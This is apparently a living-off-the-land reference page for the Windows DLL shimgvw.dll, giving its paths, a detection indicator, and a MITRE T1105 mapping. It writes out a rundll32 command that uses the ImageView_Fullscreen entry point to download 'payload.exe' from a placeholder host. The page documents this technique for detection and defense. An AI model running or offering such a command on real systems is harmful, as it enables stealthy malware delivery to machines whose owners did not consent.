.. /Shimgvw.dll
Star

Download

Photo Gallery Viewer

Paths:

c:\windows\system32\shimgvw.dll
c:\windows\syswow64\shimgvw.dll

Resources:

https://twitter.com/eral4m/status/1479080793003671557

Acknowledgements:

Eral4m (@eral4m)

Detection:

IOC: Execution of rundll32.exe with 'ImageView_Fullscreen' and a protocol handler ('://') on the command line

Download

Once executed, rundll32.exe will download the file at the URL in the command to %LOCALAPPDATA%\Microsoft\Windows\INetCache\IE\<random>\payload[1].exe. Can also be used with entrypoint 'ImageView_FullscreenA'.

rundll32.exe c:\Windows\System32\shimgvw.dll,ImageView_Fullscreen http://x.x.x.x/payload.exe

Usecase: Download file from remote location.
Privileges required: User
OS: Windows 10, Windows 11
MITRE ATT&CK®: T1105

.. /Shimgvw.dll Star

Download

.. /Shimgvw.dll
Star